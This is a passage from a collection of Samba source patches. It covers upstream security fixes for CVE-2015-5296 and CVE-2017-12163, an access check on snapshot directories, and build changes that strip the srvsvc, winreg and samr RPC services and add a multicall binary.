71 | SHADOW2_NEXT(RMDIR, (handle, name), int, -1);
72 | @@ -877,6 +916,7 @@ static int shadow_copy2_get_shadow_copy2
73 | SMB_STRUCT_DIRENT *d;
74 | TALLOC_CTX *tmp_ctx = talloc_new(handle->data);
75 | char *snapshot;
76 | + bool ret;
77 |
78 | snapdir = shadow_copy2_find_snapdir(tmp_ctx, handle);
79 | if (snapdir == NULL) {
80 | @@ -886,6 +926,13 @@ static int shadow_copy2_get_shadow_copy2
81 | talloc_free(tmp_ctx);
82 | return -1;
83 | }
84 | + ret = check_access_snapdir(handle, snapdir);
85 | + if (!ret) {
86 | + DEBUG(0,("access denied on listing snapdir %s\n", snapdir));
87 | + errno = EACCES;
88 | + talloc_free(tmp_ctx);
89 | + return -1;
90 | + }
91 |
92 | p = SMB_VFS_NEXT_OPENDIR(handle, snapdir, NULL, 0);
93 |
94 |
--------------------------------------------------------------------------------
/samba-patches/011-patch-cve-2015-5296.patch:
--------------------------------------------------------------------------------
1 | From 25139116756cc285a3a5534834cc276ef1b7baaa Mon Sep 17 00:00:00 2001
2 | From: Stefan Metzmacher
3 | Date: Wed, 30 Sep 2015 21:17:02 +0200
4 | Subject: [PATCH 1/2] CVE-2015-5296: s3:libsmb: force signing when requiring
5 | encryption in do_connect()
6 |
7 | BUG: https://bugzilla.samba.org/show_bug.cgi?id=11536
8 |
9 | Signed-off-by: Stefan Metzmacher
10 | Reviewed-by: Jeremy Allison
11 | ---
12 | source3/libsmb/clidfs.c | 7 ++++++-
13 | 1 file changed, 6 insertions(+), 1 deletion(-)
14 |
15 | --- a/source3/libsmb/clidfs.c
16 | +++ b/source3/libsmb/clidfs.c
17 | @@ -98,6 +98,11 @@ static struct cli_state *do_connect(TALL
18 | const char *username;
19 | const char *password;
20 | NTSTATUS status;
21 | + int signing_state = get_cmdline_auth_info_signing_state(auth_info);
22 | +
23 | + if (force_encrypt) {
24 | + signing_state = Required;
25 | + }
26 |
27 | /* make a copy so we don't modify the global string 'service' */
28 | servicename = talloc_strdup(ctx,share);
29 | @@ -132,7 +137,7 @@ static struct cli_state *do_connect(TALL
30 | zero_sockaddr(&ss);
31 |
32 | /* have to open a new connection */
33 | - c = cli_initialise_ex(get_cmdline_auth_info_signing_state(auth_info));
34 | + c = cli_initialise_ex(signing_state);
35 | if (c == NULL) {
36 | d_printf("Connection to %s failed\n", server_n);
37 | return NULL;
38 | --- a/source3/libsmb/libsmb_server.c
39 | +++ b/source3/libsmb/libsmb_server.c
40 | @@ -258,6 +258,7 @@ SMBC_server_internal(TALLOC_CTX *ctx,
41 | const char *username_used;
42 | NTSTATUS status;
43 | char *newserver, *newshare;
44 | + int signing_state = Undefined;
45 |
46 | zero_sockaddr(&ss);
47 | ZERO_STRUCT(c);
48 | @@ -404,8 +405,12 @@ again:
49 |
50 | zero_sockaddr(&ss);
51 |
52 | + if (context->internal->smb_encryption_level != SMBC_ENCRYPTLEVEL_NONE) {
53 | + signing_state = Required;
54 | + }
55 | +
56 | /* have to open a new connection */
57 | - if ((c = cli_initialise()) == NULL) {
58 | + if ((c = cli_initialise_ex(signing_state)) == NULL) {
59 | errno = ENOMEM;
60 | return NULL;
61 | }
62 | @@ -750,6 +755,7 @@ SMBC_attr_server(TALLOC_CTX *ctx,
63 | ipc_srv = SMBC_find_server(ctx, context, server, "*IPC$",
64 | pp_workgroup, pp_username, pp_password);
65 | if (!ipc_srv) {
66 | + int signing_state = Undefined;
67 |
68 | /* We didn't find a cached connection. Get the password */
69 | if (!*pp_password || (*pp_password)[0] == '\0') {
70 | @@ -771,6 +777,9 @@ SMBC_attr_server(TALLOC_CTX *ctx,
71 | if (smbc_getOptionUseCCache(context)) {
72 | flags |= CLI_FULL_CONNECTION_USE_CCACHE;
73 | }
74 | + if (context->internal->smb_encryption_level != SMBC_ENCRYPTLEVEL_NONE) {
75 | + signing_state = Required;
76 | + }
77 |
78 | zero_sockaddr(&ss);
79 | nt_status = cli_full_connection(&ipc_cli,
80 | @@ -780,7 +789,7 @@ SMBC_attr_server(TALLOC_CTX *ctx,
81 | *pp_workgroup,
82 | *pp_password,
83 | flags,
84 | - Undefined);
85 | + signing_state);
86 | if (! NT_STATUS_IS_OK(nt_status)) {
87 | DEBUG(1,("cli_full_connection failed! (%s)\n",
88 | nt_errstr(nt_status)));
89 |
--------------------------------------------------------------------------------
/samba-patches/280-strip_srvsvc.patch:
--------------------------------------------------------------------------------
1 | --- a/source3/smbd/lanman.c
2 | +++ b/source3/smbd/lanman.c
3 | @@ -2197,6 +2197,10 @@ static bool api_RNetShareAdd(struct smbd
4 | struct srvsvc_NetShareInfo2 info2;
5 | struct dcerpc_binding_handle *b;
6 |
7 | +#ifndef SRVSVC_SUPPORT
8 | + return False;
9 | +#endif
10 | +
11 | if (!str1 || !str2 || !p) {
12 | return False;
13 | }
14 | @@ -3589,10 +3593,7 @@ static bool api_RNetServerGetInfo(struct
15 | NTSTATUS status;
16 | WERROR werr;
17 | TALLOC_CTX *mem_ctx = talloc_tos();
18 | - struct rpc_pipe_client *cli = NULL;
19 | - union srvsvc_NetSrvInfo info;
20 | int errcode;
21 | - struct dcerpc_binding_handle *b;
22 |
23 | if (!str1 || !str2 || !p) {
24 | return False;
25 | @@ -3655,66 +3656,16 @@ static bool api_RNetServerGetInfo(struct
26 | p = *rdata;
27 | p2 = p + struct_len;
28 |
29 | - status = rpc_pipe_open_interface(mem_ctx, &ndr_table_srvsvc.syntax_id,
30 | - conn->session_info,
31 | - &conn->sconn->client_id,
32 | - conn->sconn->msg_ctx,
33 | - &cli);
34 | - if (!NT_STATUS_IS_OK(status)) {
35 | - DEBUG(0,("api_RNetServerGetInfo: could not connect to srvsvc: %s\n",
36 | - nt_errstr(status)));
37 | - errcode = W_ERROR_V(ntstatus_to_werror(status));
38 | - goto out;
39 | - }
40 | -
41 | - b = cli->binding_handle;
42 | -
43 | - status = dcerpc_srvsvc_NetSrvGetInfo(b, mem_ctx,
44 | - NULL,
45 | - 101,
46 | - &info,
47 | - &werr);
48 | - if (!NT_STATUS_IS_OK(status)) {
49 | - errcode = W_ERROR_V(ntstatus_to_werror(status));
50 | - goto out;
51 | - }
52 | - if (!W_ERROR_IS_OK(werr)) {
53 | - errcode = W_ERROR_V(werr);
54 | - goto out;
55 | - }
56 | -
57 | - if (info.info101 == NULL) {
58 | - errcode = W_ERROR_V(WERR_INVALID_PARAM);
59 | - goto out;
60 | - }
61 | -
62 | if (uLevel != 20) {
63 | - srvstr_push(NULL, 0, p, info.info101->server_name, 16,
64 | + srvstr_push(NULL, 0, p, global_myname(), 16,
65 | STR_ASCII|STR_UPPER|STR_TERMINATE);
66 | - }
67 | + }
68 | p += 16;
69 | if (uLevel > 0) {
70 | - SCVAL(p,0,info.info101->version_major);
71 | - SCVAL(p,1,info.info101->version_minor);
72 | - SIVAL(p,2,info.info101->server_type);
73 | -
74 | - if (mdrcnt == struct_len) {
75 | - SIVAL(p,6,0);
76 | - } else {
77 | - SIVAL(p,6,PTR_DIFF(p2,*rdata));
78 | - if (mdrcnt - struct_len <= 0) {
79 | - return false;
80 | - }
81 | - push_ascii(p2,
82 | - info.info101->comment,
83 | - MIN(mdrcnt - struct_len,
84 | - MAX_SERVER_STRING_LENGTH),
85 | - STR_TERMINATE);
86 | - p2 = skip_string(*rdata,*rdata_len,p2);
87 | - if (!p2) {
88 | - return False;
89 | - }
90 | - }
91 | + SCVAL(p,0,lp_major_announce_version());
92 | + SCVAL(p,1,lp_minor_announce_version());
93 | + SIVAL(p,2,lp_default_server_announce());
94 | + SIVAL(p,6,0);
95 | }
96 |
97 | if (uLevel > 1) {
98 | @@ -5405,6 +5356,10 @@ static bool api_RNetSessionEnum(struct s
99 | uint32_t totalentries, resume_handle = 0;
100 | uint32_t count = 0;
101 |
102 | +#ifndef SRVSVC_SUPPORT
103 | + return False;
104 | +#endif
105 | +
106 | if (!str1 || !str2 || !p) {
107 | return False;
108 | }
109 | --- a/source3/rpc_server/srvsvc/srv_srvsvc_nt.c
110 | +++ b/source3/rpc_server/srvsvc/srv_srvsvc_nt.c
111 | @@ -1533,6 +1533,10 @@ WERROR _srvsvc_NetShareSetInfo(struct pi
112 | TALLOC_CTX *ctx = p->mem_ctx;
113 | union srvsvc_NetShareInfo *info = r->in.info;
114 |
115 | +#ifndef FULL_SRVSVC
116 | + return WERR_ACCESS_DENIED;
117 | +#endif
118 | +
119 | DEBUG(5,("_srvsvc_NetShareSetInfo: %d\n", __LINE__));
120 |
121 | if (!r->in.share_name) {
122 | @@ -1763,6 +1767,10 @@ WERROR _srvsvc_NetShareAdd(struct pipes_
123 | int max_connections = 0;
124 | TALLOC_CTX *ctx = p->mem_ctx;
125 |
126 | +#ifndef FULL_SRVSVC
127 | + return WERR_ACCESS_DENIED;
128 | +#endif
129 | +
130 | DEBUG(5,("_srvsvc_NetShareAdd: %d\n", __LINE__));
131 |
132 | if (r->out.parm_error) {
133 | @@ -1945,6 +1953,10 @@ WERROR _srvsvc_NetShareDel(struct pipes_
134 | struct share_params *params;
135 | TALLOC_CTX *ctx = p->mem_ctx;
136 |
137 | +#ifndef FULL_SRVSVC
138 | + return WERR_ACCESS_DENIED;
139 | +#endif
140 | +
141 | DEBUG(5,("_srvsvc_NetShareDel: %d\n", __LINE__));
142 |
143 | if (!r->in.share_name) {
144 |
--------------------------------------------------------------------------------
/samba-patches/230-remove_winreg_support.patch:
--------------------------------------------------------------------------------
1 | --- a/source3/rpc_server/rpc_ep_setup.c
2 | +++ b/source3/rpc_server/rpc_ep_setup.c
3 | @@ -409,6 +409,7 @@ static bool epmapper_shutdown_cb(void *p
4 | return true;
5 | }
6 |
7 | +#ifdef WINREG_SUPPORT
8 | static bool winreg_init_cb(void *ptr)
9 | {
10 | struct dcesrv_ep_context *ep_ctx =
11 | @@ -456,6 +457,7 @@ static bool winreg_init_cb(void *ptr)
12 |
13 | return true;
14 | }
15 | +#endif
16 |
17 | static bool srvsvc_init_cb(void *ptr)
18 | {
19 | @@ -710,10 +712,12 @@ static bool svcctl_init_cb(void *ptr)
20 | "epmapper",
21 | "none");
22 |
23 | +#ifdef WINREG_SUPPORT
24 | ok = svcctl_init_winreg(ep_ctx->msg_ctx);
25 | if (!ok) {
26 | return false;
27 | }
28 | +#endif
29 |
30 | /* initialize the control hooks */
31 | init_service_op_table();
32 | @@ -785,10 +789,12 @@ static bool eventlog_init_cb(void *ptr)
33 | "epmapper",
34 | "none");
35 |
36 | +#ifdef WINREG_SUPPORT
37 | ok = eventlog_init_winreg(ep_ctx->msg_ctx);
38 | if (!ok) {
39 | return false;
40 | }
41 | +#endif
42 |
43 | if (StrCaseCmp(rpcsrv_type, "embedded") == 0 ||
44 | StrCaseCmp(rpcsrv_type, "daemon") == 0) {
45 | @@ -1077,12 +1083,14 @@ bool dcesrv_ep_setup(struct tevent_conte
46 | }
47 | }
48 |
49 | +#ifdef WINREG_SUPPORT
50 | winreg_cb.init = winreg_init_cb;
51 | winreg_cb.shutdown = NULL;
52 | winreg_cb.private_data = ep_ctx;
53 | if (!NT_STATUS_IS_OK(rpc_winreg_init(&winreg_cb))) {
54 | return false;
55 | }
56 | +#endif
57 |
58 | srvsvc_cb.init = srvsvc_init_cb;
59 | srvsvc_cb.shutdown = NULL;
60 | --- a/source3/smbd/server_exit.c
61 | +++ b/source3/smbd/server_exit.c
62 | @@ -150,7 +150,9 @@ static void exit_server_common(enum serv
63 | #endif
64 |
65 | rpc_srvsvc_shutdown();
66 | +#ifdef WINREG_SUPPORT
67 | rpc_winreg_shutdown();
68 | +#endif
69 |
70 | rpc_netlogon_shutdown();
71 | rpc_samr_shutdown();
72 | --- a/source3/librpc/rpc/rpc_common.c
73 | +++ b/source3/librpc/rpc/rpc_common.c
74 | @@ -112,9 +112,11 @@ static bool initialize_interfaces(void)
75 | if (!smb_register_ndr_interface(&ndr_table_wkssvc)) {
76 | return false;
77 | }
78 | +#ifdef WINREG_SUPPORT
79 | if (!smb_register_ndr_interface(&ndr_table_winreg)) {
80 | return false;
81 | }
82 | +#endif
83 | #ifdef PRINTER_SUPPORT
84 | if (!smb_register_ndr_interface(&ndr_table_spoolss)) {
85 | return false;
86 | --- a/source3/rpc_server/svcctl/srv_svcctl_nt.c
87 | +++ b/source3/rpc_server/svcctl/srv_svcctl_nt.c
88 | @@ -95,9 +95,11 @@ bool init_service_op_table( void )
89 | svcctl_ops[i].ops = &netlogon_svc_ops;
90 | i++;
91 |
92 | +#ifdef WINREG_SUPPORT
93 | svcctl_ops[i].name = talloc_strdup( svcctl_ops, "RemoteRegistry" );
94 | svcctl_ops[i].ops = &winreg_svc_ops;
95 | i++;
96 | +#endif
97 |
98 | svcctl_ops[i].name = talloc_strdup( svcctl_ops, "WINS" );
99 | svcctl_ops[i].ops = &wins_svc_ops;
100 | --- a/source3/services/svc_winreg_glue.c
101 | +++ b/source3/services/svc_winreg_glue.c
102 | @@ -88,6 +88,10 @@ struct security_descriptor *svcctl_get_s
103 | NTSTATUS status;
104 | WERROR result = WERR_OK;
105 |
106 | +#ifndef WINREG_SUPPORT
107 | + return NULL;
108 | +#endif
109 | +
110 | key = talloc_asprintf(mem_ctx,
111 | "%s\\%s\\Security",
112 | TOP_LEVEL_SERVICES_KEY, name);
113 | @@ -161,6 +165,10 @@ bool svcctl_set_secdesc(struct messaging
114 | NTSTATUS status;
115 | WERROR result = WERR_OK;
116 |
117 | +#ifndef WINREG_SUPPORT
118 | + return false;
119 | +#endif
120 | +
121 | tmp_ctx = talloc_stackframe();
122 | if (tmp_ctx == NULL) {
123 | return false;
124 | @@ -272,6 +280,10 @@ const char *svcctl_get_string_value(TALL
125 | NTSTATUS status;
126 | WERROR result = WERR_OK;
127 |
128 | +#ifndef WINREG_SUPPORT
129 | + return NULL;
130 | +#endif
131 | +
132 | tmp_ctx = talloc_stackframe();
133 | if (tmp_ctx == NULL) {
134 | return NULL;
135 | --- a/source3/rpcclient/rpcclient.c
136 | +++ b/source3/rpcclient/rpcclient.c
137 | @@ -642,7 +642,9 @@ static struct cmd_set *rpcclient_command
138 | drsuapi_commands,
139 | eventlog_commands,
140 | #endif
141 | +#ifdef WINREG_SUPPORT
142 | winreg_commands,
143 | +#endif
144 | NULL
145 | };
146 |
147 |
--------------------------------------------------------------------------------
/samba-patches/110-multicall.patch:
--------------------------------------------------------------------------------
1 | --- a/source3/Makefile.in
2 | +++ b/source3/Makefile.in
3 | @@ -73,22 +73,22 @@ LDAP_LIBS=@LDAP_LIBS@
4 | NSCD_LIBS=@NSCD_LIBS@
5 | UUID_LIBS=@UUID_LIBS@
6 | LIBWBCLIENT=@LIBWBCLIENT_STATIC@ @LIBWBCLIENT_SHARED@
7 | -LIBWBCLIENT_LIBS=@LIBWBCLIENT_LIBS@
8 | +LIBWBCLIENT_LIBS=@LIBWBCLIENT_STATIC@
9 | PTHREAD_LDFLAGS=@PTHREAD_LDFLAGS@
10 | PTHREAD_CFLAGS=@PTHREAD_CFLAGS@
11 | DNSSD_LIBS=@DNSSD_LIBS@
12 | AVAHI_LIBS=@AVAHI_LIBS@
13 | POPT_LIBS=@POPTLIBS@
14 | LIBTALLOC=@LIBTALLOC_STATIC@ @LIBTALLOC_SHARED@
15 | -LIBTALLOC_LIBS=@LIBTALLOC_LIBS@
16 | +LIBTALLOC_LIBS=@LIBTALLOC_STATIC@
17 | LIBTEVENT=@LIBTEVENT_STATIC@ @LIBTEVENT_SHARED@
18 | LIBTEVENT_LIBS=@LIBTEVENT_LIBS@
19 | LIBREPLACE_LIBS=@LIBREPLACE_LIBS@
20 | LIBTDB=@LIBTDB_STATIC@ @LIBTDB_SHARED@
21 | -LIBTDB_LIBS=@LIBTDB_LIBS@
22 | +LIBTDB_LIBS=@LIBTDB_STATIC@
23 | TDB_DEPS=@TDB_DEPS@
24 | LIBNETAPI=@LIBNETAPI_STATIC@ @LIBNETAPI_SHARED@
25 | -LIBNETAPI_LIBS=@LIBNETAPI_LIBS@
26 | +LIBNETAPI_LIBS=@LIBNETAPI_STATIC@
27 | LIBSMBCLIENT_LIBS=@LIBSMBCLIENT_LIBS@
28 | LIBSMBSHAREMODES_LIBS=@LIBSMBSHAREMODES_LIBS@
29 |
30 | @@ -216,7 +216,7 @@ PATH_FLAGS = -DSMB_PASSWD_FILE=\"$(SMB_P
31 |
32 | # Note that all executable programs now provide for an optional executable suffix.
33 |
34 | -SBIN_PROGS = bin/smbd@EXEEXT@ bin/nmbd@EXEEXT@ @SWAT_SBIN_TARGETS@ @EXTRA_SBIN_PROGS@
35 | +SBIN_PROGS = bin/samba_multicall@EXEEXT@ bin/smbd@EXEEXT@ bin/nmbd@EXEEXT@ @SWAT_SBIN_TARGETS@ @EXTRA_SBIN_PROGS@
36 |
37 | BIN_PROGS1 = bin/smbclient@EXEEXT@ bin/net@EXEEXT@ bin/smbspool@EXEEXT@ \
38 | bin/testparm@EXEEXT@ bin/smbstatus@EXEEXT@ bin/smbget@EXEEXT@ \
39 | @@ -1799,6 +1799,42 @@ bin/.dummy:
40 | dir=bin $(MAKEDIR); fi
41 | @: >> $@ || : > $@ # what a fancy emoticon!
42 |
43 | +smbd/server_multicall.o: smbd/server.c smbd/server.o
44 | + @echo Compiling $<.c
45 | + @$(COMPILE_CC_PATH) -Dmain=smbd_main && exit 0;\
46 | + echo "The following command failed:" 1>&2;\
47 | + echo "$(COMPILE_CC_PATH)" 1>&2;\
48 | + $(COMPILE_CC_PATH) >/dev/null 2>&1
49 | +
50 | +nmbd/nmbd_multicall.o: nmbd/nmbd.c nmbd/nmbd.o
51 | + @echo Compiling $<.c
52 | + @$(COMPILE_CC_PATH) -Dmain=nmbd_main && exit 0;\
53 | + echo "The following command failed:" 1>&2;\
54 | + echo "$(COMPILE_CC_PATH)" 1>&2;\
55 | + $(COMPILE_CC_PATH) >/dev/null 2>&1
56 | +
57 | +utils/smbpasswd_multicall.o: utils/smbpasswd.c utils/smbpasswd.o
58 | + @echo Compiling $<.c
59 | + @$(COMPILE_CC_PATH) -Dmain=smbpasswd_main && exit 0;\
60 | + echo "The following command failed:" 1>&2;\
61 | + echo "$(COMPILE_CC_PATH)" 1>&2;\
62 | + $(COMPILE_CC_PATH) >/dev/null 2>&1
63 | +
64 | +SMBD_MULTI_O = $(patsubst smbd/server.o,smbd/server_multicall.o,$(SMBD_OBJ))
65 | +NMBD_MULTI_O = $(patsubst nmbd/nmbd.o,nmbd/nmbd_multicall.o,$(filter-out $(LIB_DUMMY_OBJ),$(NMBD_OBJ)))
66 | +SMBPASSWD_MULTI_O = $(patsubst utils/smbpasswd.o,utils/smbpasswd_multicall.o,$(filter-out $(LIB_DUMMY_OBJ),$(SMBPASSWD_OBJ)))
67 | +MULTI_O = multi.o
68 | +
69 | +MULTICALL_O = $(sort $(SMBD_MULTI_O) $(NMBD_MULTI_O) $(SMBPASSWD_MULTI_O) $(MULTI_O))
70 | +
71 | +bin/samba_multicall@EXEEXT@: $(BINARY_PREREQS) $(MULTICALL_O) $(LIBTALLOC) $(LIBTDB) $(LIBWBCLIENT) @BUILD_POPT@
72 | + @echo Linking $@
73 | + @$(CC) -o $@ $(MULTICALL_O) $(LDFLAGS) $(LDAP_LIBS) @SMBD_FAM_LIBS@ \
74 | + $(KRB5LIBS) $(DYNEXP) $(PRINT_LIBS) $(AUTH_LIBS) \
75 | + $(ACL_LIBS) $(PASSDB_LIBS) $(LIBS) $(DNSSD_LIBS) $(AVAHI_LIBS) \
76 | + $(POPT_LIBS) @SMBD_LIBS@ $(LIBTALLOC_LIBS) $(LIBTEVENT_LIBS) $(LIBTDB_LIBS) \
77 | + $(LIBWBCLIENT_LIBS) $(ZLIB_LIBS)
78 | +
79 | bin/smbd@EXEEXT@: $(BINARY_PREREQS) $(SMBD_OBJ) $(LIBTALLOC) $(LIBTEVENT) $(LIBTDB) $(LIBWBCLIENT) @BUILD_POPT@
80 | @echo Linking $@
81 | @$(CC) -o $@ $(SMBD_OBJ) $(LDFLAGS) $(LDAP_LIBS) @SMBD_FAM_LIBS@ \
82 | --- /dev/null
83 | +++ b/source3/multi.c
84 | @@ -0,0 +1,35 @@
85 | +#include
86 | +#include
87 | +
88 | +extern int smbd_main(int argc, char **argv);
89 | +extern int nmbd_main(int argc, char **argv);
90 | +extern int smbpasswd_main(int argc, char **argv);
91 | +
92 | +static struct {
93 | + const char *name;
94 | + int (*func)(int argc, char **argv);
95 | +} multicall[] = {
96 | + { "smbd", smbd_main },
97 | + { "nmbd", nmbd_main },
98 | + { "smbpasswd", smbpasswd_main },
99 | +};
100 | +
101 | +#define ARRAY_SIZE(a) (sizeof(a) / sizeof(a[0]))
102 | +
103 | +int main(int argc, char **argv)
104 | +{
105 | + int i;
106 | +
107 | + for (i = 0; i < ARRAY_SIZE(multicall); i++) {
108 | + if (strstr(argv[0], multicall[i].name))
109 | + return multicall[i].func(argc, argv);
110 | + }
111 | +
112 | + fprintf(stderr, "Invalid multicall command, available commands:");
113 | + for (i = 0; i < ARRAY_SIZE(multicall); i++)
114 | + fprintf(stderr, " %s", multicall[i].name);
115 | +
116 | + fprintf(stderr, "\n");
117 | +
118 | + return 1;
119 | +}
120 |
--------------------------------------------------------------------------------
/samba-patches/260-remove_samr.patch:
--------------------------------------------------------------------------------
1 | --- a/source3/rpc_server/rpc_handles.c
2 | +++ b/source3/rpc_server/rpc_handles.c
3 | @@ -59,8 +59,11 @@ struct handle_list {
4 |
5 | static bool is_samr_lsa_pipe(const struct ndr_syntax_id *syntax)
6 | {
7 | - return (ndr_syntax_id_equal(syntax, &ndr_table_samr.syntax_id)
8 | - || ndr_syntax_id_equal(syntax, &ndr_table_lsarpc.syntax_id));
9 | + return
10 | +#ifdef SAMR_SUPPORT
11 | + ndr_syntax_id_equal(syntax, &ndr_table_samr.syntax_id) ||
12 | +#endif
13 | + ndr_syntax_id_equal(syntax, &ndr_table_lsarpc.syntax_id);
14 | }
15 |
16 | size_t num_pipe_handles(struct pipes_struct *p)
17 | --- a/source3/librpc/rpc/rpc_common.c
18 | +++ b/source3/librpc/rpc/rpc_common.c
19 | @@ -100,9 +100,11 @@ static bool initialize_interfaces(void)
20 | return false;
21 | }
22 | #endif
23 | +#ifdef SAMR_SUPPORT
24 | if (!smb_register_ndr_interface(&ndr_table_samr)) {
25 | return false;
26 | }
27 | +#endif
28 | #ifdef NETLOGON_SUPPORT
29 | if (!smb_register_ndr_interface(&ndr_table_netlogon)) {
30 | return false;
31 | --- a/source3/rpc_server/rpc_ep_setup.c
32 | +++ b/source3/rpc_server/rpc_ep_setup.c
33 | @@ -557,6 +557,7 @@ static bool lsarpc_init_cb(void *ptr)
34 | return true;
35 | }
36 |
37 | +#ifdef SAMR_SUPPORT
38 | static bool samr_init_cb(void *ptr)
39 | {
40 | struct dcesrv_ep_context *ep_ctx =
41 | @@ -605,6 +606,7 @@ static bool samr_init_cb(void *ptr)
42 |
43 | return true;
44 | }
45 | +#endif
46 |
47 | #ifdef NETLOGON_SUPPORT
48 | static bool netlogon_init_cb(void *ptr)
49 | @@ -1111,12 +1113,14 @@ bool dcesrv_ep_setup(struct tevent_conte
50 | return false;
51 | }
52 |
53 | +#ifdef SAMR_SUPPORT
54 | samr_cb.init = samr_init_cb;
55 | samr_cb.shutdown = NULL;
56 | samr_cb.private_data = ep_ctx;
57 | if (!NT_STATUS_IS_OK(rpc_samr_init(&samr_cb))) {
58 | return false;
59 | }
60 | +#endif
61 |
62 | #ifdef NETLOGON_SUPPORT
63 | netlogon_cb.init = netlogon_init_cb;
64 | --- a/source3/smbd/server_exit.c
65 | +++ b/source3/smbd/server_exit.c
66 | @@ -159,7 +159,9 @@ static void exit_server_common(enum serv
67 | #ifdef NETLOGON_SUPPORT
68 | rpc_netlogon_shutdown();
69 | #endif
70 | +#ifdef SAMR_SUPPORT
71 | rpc_samr_shutdown();
72 | +#endif
73 | rpc_lsarpc_shutdown();
74 | }
75 |
76 | --- a/source3/rpcclient/rpcclient.c
77 | +++ b/source3/rpcclient/rpcclient.c
78 | @@ -623,7 +623,9 @@ static struct cmd_set *rpcclient_command
79 | rpcclient_commands,
80 | lsarpc_commands,
81 | ds_commands,
82 | +#ifdef SAMR_SUPPORT
83 | samr_commands,
84 | +#endif
85 | #ifdef PRINTER_SUPPORT
86 | spoolss_commands,
87 | #endif
88 | --- a/source3/smbd/lanman.c
89 | +++ b/source3/smbd/lanman.c
90 | @@ -2353,6 +2353,10 @@ static bool api_RNetGroupEnum(struct smb
91 | NTSTATUS status, result;
92 | struct dcerpc_binding_handle *b;
93 |
94 | +#ifndef SAMR_SUPPORT
95 | + return False;
96 | +#endif
97 | +
98 | if (!str1 || !str2 || !p) {
99 | return False;
100 | }
101 | @@ -2541,6 +2545,10 @@ static bool api_NetUserGetGroups(struct
102 | NTSTATUS status, result;
103 | struct dcerpc_binding_handle *b;
104 |
105 | +#ifndef SAMR_SUPPORT
106 | + return False;
107 | +#endif
108 | +
109 | if (!str1 || !str2 || !UserName || !p) {
110 | return False;
111 | }
112 | @@ -2741,6 +2749,10 @@ static bool api_RNetUserEnum(struct smbd
113 |
114 | struct dcerpc_binding_handle *b;
115 |
116 | +#ifndef SAMR_SUPPORT
117 | + return False;
118 | +#endif
119 | +
120 | if (!str1 || !str2 || !p) {
121 | return False;
122 | }
123 | @@ -2979,6 +2991,10 @@ static bool api_SamOEMChangePassword(str
124 | int bufsize;
125 | struct dcerpc_binding_handle *b;
126 |
127 | +#ifndef SAMR_SUPPORT
128 | + return False;
129 | +#endif
130 | +
131 | *rparam_len = 4;
132 | *rparam = smb_realloc_limit(*rparam,*rparam_len);
133 | if (!*rparam) {
134 | @@ -4020,6 +4036,10 @@ static bool api_RNetUserGetInfo(struct s
135 | union samr_UserInfo *info;
136 | struct dcerpc_binding_handle *b = NULL;
137 |
138 | +#ifndef SAMR_SUPPORT
139 | + return False;
140 | +#endif
141 | +
142 | if (!str1 || !str2 || !UserName || !p) {
143 | return False;
144 | }
145 | --- a/source3/rpc_server/srv_pipe.c
146 | +++ b/source3/rpc_server/srv_pipe.c
147 | @@ -409,6 +409,7 @@ static bool check_bind_req(struct pipes_
148 | context_fns->syntax = *abstract;
149 |
150 | context_fns->allow_connect = lp_allow_dcerpc_auth_level_connect();
151 | +#ifdef SAMR_SUPPORT
152 | /*
153 | * for the samr and the lsarpc interfaces we don't allow "connect"
154 | * auth_level by default.
155 | @@ -417,6 +418,7 @@ static bool check_bind_req(struct pipes_
156 | if (ok) {
157 | context_fns->allow_connect = false;
158 | }
159 | +#endif
160 | ok = ndr_syntax_id_equal(abstract, &ndr_table_lsarpc.syntax_id);
161 | if (ok) {
162 | context_fns->allow_connect = false;
163 |
--------------------------------------------------------------------------------
/samba-patches/031-CVE-2017-12163-v3.6.patch:
--------------------------------------------------------------------------------
1 | From: =?utf-8?q?Guido_G=C3=BCnther?=
2 | Date: Wed, 20 Sep 2017 20:02:03 +0200
3 | Subject: CVE-2017-12163: s3:smbd: Prevent client short SMB1 write from
4 | writing server memory to file.
5 |
6 | BUG: https://bugzilla.samba.org/show_bug.cgi?id=13020
7 |
8 | Author: Jeremy Allison
9 | Signed-off-by: Jeremy Allison
10 | Signed-off-by: Stefan Metzmacher
11 | ---
12 | source3/smbd/reply.c | 50 ++++++++++++++++++++++++++++++++++++++++++++++++++
13 | 1 file changed, 50 insertions(+)
14 |
15 | --- a/source3/smbd/reply.c
16 | +++ b/source3/smbd/reply.c
17 | @@ -3979,6 +3979,9 @@ void reply_writebraw(struct smb_request
18 | }
19 |
20 | /* Ensure we don't write bytes past the end of this packet. */
21 | + /*
22 | + * This already protects us against CVE-2017-12163.
23 | + */
24 | if (data + numtowrite > smb_base(req->inbuf) + smb_len(req->inbuf)) {
25 | reply_nterror(req, NT_STATUS_INVALID_PARAMETER);
26 | error_to_writebrawerr(req);
27 | @@ -4080,6 +4083,11 @@ void reply_writebraw(struct smb_request
28 | exit_server_cleanly("secondary writebraw failed");
29 | }
30 |
31 | + /*
32 | + * We are not vulnerable to CVE-2017-12163
33 | + * here as we are guarenteed to have numtowrite
34 | + * bytes available - we just read from the client.
35 | + */
36 | nwritten = write_file(req,fsp,buf+4,startpos+nwritten,numtowrite);
37 | if (nwritten == -1) {
38 | TALLOC_FREE(buf);
39 | @@ -4161,6 +4169,7 @@ void reply_writeunlock(struct smb_reques
40 | connection_struct *conn = req->conn;
41 | ssize_t nwritten = -1;
42 | size_t numtowrite;
43 | + size_t remaining;
44 | SMB_OFF_T startpos;
45 | const char *data;
46 | NTSTATUS status = NT_STATUS_OK;
47 | @@ -4193,6 +4202,17 @@ void reply_writeunlock(struct smb_reques
48 | startpos = IVAL_TO_SMB_OFF_T(req->vwv+2, 0);
49 | data = (const char *)req->buf + 3;
50 |
51 | + /*
52 | + * Ensure client isn't asking us to write more than
53 | + * they sent. CVE-2017-12163.
54 | + */
55 | + remaining = smbreq_bufrem(req, data);
56 | + if (numtowrite > remaining) {
57 | + reply_nterror(req, NT_STATUS_INVALID_PARAMETER);
58 | + END_PROFILE(SMBwriteunlock);
59 | + return;
60 | + }
61 | +
62 | if (!fsp->print_file && numtowrite > 0) {
63 | init_strict_lock_struct(fsp, (uint64_t)req->smbpid,
64 | (uint64_t)startpos, (uint64_t)numtowrite, WRITE_LOCK,
65 | @@ -4274,6 +4294,7 @@ void reply_write(struct smb_request *req
66 | {
67 | connection_struct *conn = req->conn;
68 | size_t numtowrite;
69 | + size_t remaining;
70 | ssize_t nwritten = -1;
71 | SMB_OFF_T startpos;
72 | const char *data;
73 | @@ -4314,6 +4335,17 @@ void reply_write(struct smb_request *req
74 | startpos = IVAL_TO_SMB_OFF_T(req->vwv+2, 0);
75 | data = (const char *)req->buf + 3;
76 |
77 | + /*
